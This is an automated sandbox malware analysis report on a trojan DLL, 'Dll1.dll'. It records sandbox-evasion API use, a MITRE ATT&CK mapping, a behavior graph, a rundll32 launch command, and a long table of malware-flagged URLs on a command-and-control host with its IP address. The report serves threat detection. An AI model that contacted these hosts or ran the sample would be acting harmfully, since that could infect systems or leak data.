Source: C:\Windows\System32\loaddll32.exeAPI coverage: 6.7 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 6.1 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7460Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7476Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E1629 FindFirstFileW,CloseHandle,_strlen,ExpandEnvironmentStringsW,CopyFileW,Sleep,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6F9E1629
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9F1C74 FindFirstFileExW,0_2_6F9F1C74
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E1629 FindFirstFileW,CloseHandle,_strlen,ExpandEnvironmentStringsW,CopyFileW,Sleep,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6F9E1629
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9F1C74 FindFirstFileExW,3_2_6F9F1C74
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 30000Jump to behavior
Source: rundll32.exe, 0000000B.00000002.3274796619.00000000088BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
Source: rundll32.exe, 00000006.00000002.3274805413.0000000008499000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWwR9
Source: rundll32.exe, 00000005.00000002.3274732553.000000000843D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3274732553.0000000008469000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008499000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3274905046.0000000008B4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008DD1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D71000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.000000000891D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275450644.000000000920D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%\system32\dnsapi.dll,-103Pv\g
Source: rundll32.exe, 00000006.00000002.3274805413.000000000846E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXdJ
Source: rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
Source: rundll32.exe, 00000009.00000002.3274905046.0000000008AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(2
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E3741 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F9E3741
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9F2E75 GetProcessHeap,0_2_6F9F2E75
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E3741 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F9E3741
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E324C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6F9E324C
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9EC07A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F9EC07A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E3741 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F9E3741
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9E324C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6F9E324C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F9EC07A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F9EC07A

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 131.153.206.231 443
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E393B cpuid 0_2_6F9E393B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9E3390 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6F9E3390

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		111
Process Injection		11
Virtualization/Sandbox Evasion		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		111
Process Injection		LSASS Memory21
Security Software Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager11
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32		LSA Secrets12
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500782 Sample: Dll1.dll Startdate: 28/08/2024 Architecture: WINDOWS Score: 80 31 rammenale.com 2->31 33 198.187.3.20.in-addr.arpa 2->33 37 Antivirus detection for URL or domain 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Sigma detected: rundll32 run dll from internet 2->41 43 Sigma detected: Execute DLL with spoofed extension 2->43 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 9->11         started        14 rundll32.exe 9->14         started        16 cmd.exe 1 9->16         started        18 2 other processes 9->18 signatures6 45 System process connects to network (likely due to code injection or exploit) 11->45 20 rundll32.exe 12 14->20         started        23 rundll32.exe 14->23         started        25 rundll32.exe 16->25         started        process7 dnsIp8 35 rammenale.com 131.153.206.231, 443, 49704, 49705 SS-ASHUS United States 20->35 27 rundll32.exe 12 25->27         started        29 rundll32.exe 25->29         started        process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Dll1.dll32%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://rammenale.com/J0%Avira URL Cloudsafe
https://rammenale.com/K0%Avira URL Cloudsafe
https://rammenale.com/for2/aclog.txtQ8100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpaC:100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp%100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtJ100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtPR100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp$q100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpent100%Avira URL Cloudmalware
https://rammenale.com/M0%Avira URL Cloudsafe
https://rammenale.com/for2/aclogI100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txthe100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpryh100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4J100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtO100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtPg100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txte100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtf100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4r100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp.(100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp60100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtd100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt-100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpent0100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtentg100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmprmh100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtent100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtag100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt(100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpo100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpq100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt:100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpk100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpz100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog&100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmps100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpmpf100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpt100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp6634-1003100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpC:100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4p100%Avira URL Cloudmalware
https://rammenale.com/0%Avira URL Cloudsafe
https://rammenale.com/for2/regit.tmph100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtentindowsINetCookies100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpE0100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt6634-1003100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpj100%Avira URL Cloudmalware
https://rammenale.com/R#0%Avira URL Cloudsafe
https://rammenale.com/for2/aclog.txt4r100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpd100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt49?100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtC:100%Avira URL Cloudmalware
https://rammenale.com/for2/aclogtxtH100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpY100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt&8100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4er100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpPR100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpentindowsINetCookies100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtft100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtjx100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpU100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpV100%Avira URL Cloudmalware
https://rammenale.com/for2/aclogtxtB100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4e100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtm100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtV~100%Avira URL Cloudmalware
https://rammenale.com/for2/aclogtxt100%Avira URL Cloudmalware
https://rammenale.com/Si0%Avira URL Cloudsafe
https://rammenale.com/for2/aclog.txtr100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txts100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpG100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp5A100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpE100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtp100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp/100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtWk100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp0100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpmp100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpR0100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp2100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtz100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtP;100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4T100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4P100%Avira URL Cloudmalware
https://rammenale.com/D0%Avira URL Cloudsafe
https://rammenale.com/for2/regit.tmp4100%Avira URL Cloudmalware
https://rammenale.com/1p0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
rammenale.com
131.153.206.231
truetrue
    		unknown
    198.187.3.20.in-addr.arpa
    		unknown
    		unknownfalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://rammenale.com/for2/regit.tmptrue
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txttrue
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://rammenale.com/for2/regit.tmpentrundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369942393.0000000003645000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272727200.0000000003645000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txtPRrundll32.exe, 00000006.00000002.3273575831.0000000002A60000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/Mrundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://rammenale.com/for2/aclog.txtJrundll32.exe, 00000006.00000002.3274805413.0000000008453000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmp$qrundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/Krundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://rammenale.com/for2/aclog.txtQ8rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/Jrundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://rammenale.com/for2/regit.tmpaC:loaddll32.exe, 00000000.00000002.2084984797.0000000000A80000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmp%rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txtOrundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txtherundll32.exe, 00000005.00000002.3274732553.0000000008423000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclogIrundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txtPgrundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmp4rrundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txt4Jrundll32.exe, 00000005.00000002.3274732553.0000000008469000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmpryhrundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txtfrundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txterundll32.exe, 00000005.00000002.3272308201.000000000267A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.00000000084B7000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmp.(rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmp60rundll32.exe, 0000000C.00000002.3272566960.00000000035DA000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txtdrundll32.exe, 00000006.00000002.3274805413.0000000008453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmpent0rundll32.exe, 0000000A.00000002.3272127824.0000000002E60000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txt-rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmprmhrundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txt(rundll32.exe, 00000006.00000002.3274805413.00000000084B7000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txtagrundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txtentrundll32.exe, 00000006.00000002.3272227188.0000000002610000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txt4rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.000000000891D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txtentgrundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmporundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmpqrundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclogrundll32.exe, 0000000B.00000002.3274421722.0000000004D30000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txt:rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/regit.tmpkrundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://rammenale.com/for2/aclog.txt4jrundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        https://rammenale.com/for2/aclog&rundll32.exe, 00000006.00000002.3274805413.00000000084B7000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://rammenale.com/for2/aclog.txtFrundll32.exe, 00000005.00000002.3272308201.000000000267A000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          https://rammenale.com/for2/regit.tmpmpfrundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpzrundll32.exe, 00000009.00000002.3274905046.0000000008B5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpsrundll32.exe, 0000000A.00000002.3273620140.0000000003150000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272288324.0000000003430000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmptrundll32.exe, 0000000C.00000003.2369942393.0000000003645000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272727200.0000000003645000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpC:rundll32.exe, 00000003.00000002.2056608367.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2056574094.0000000003360000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272128849.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272263359.0000000002C10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3273461533.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3272127824.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272566960.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3272431562.0000000003480000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txt6634-1003rundll32.exe, 00000005.00000002.3274732553.0000000008423000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088A3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://rammenale.com/for2/regit.tmp6634-1003rundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275204855.00000000091F3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txt4prundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmphrundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txtentindowsINetCookiesrundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpE0rundll32.exe, 0000000A.00000002.3272127824.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/regit.tmpjrundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/R#rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://rammenale.com/for2/regit.tmpdrundll32.exe, 00000009.00000002.3274905046.0000000008AD2000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txt4rrundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://rammenale.com/for2/aclog.txt49?rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
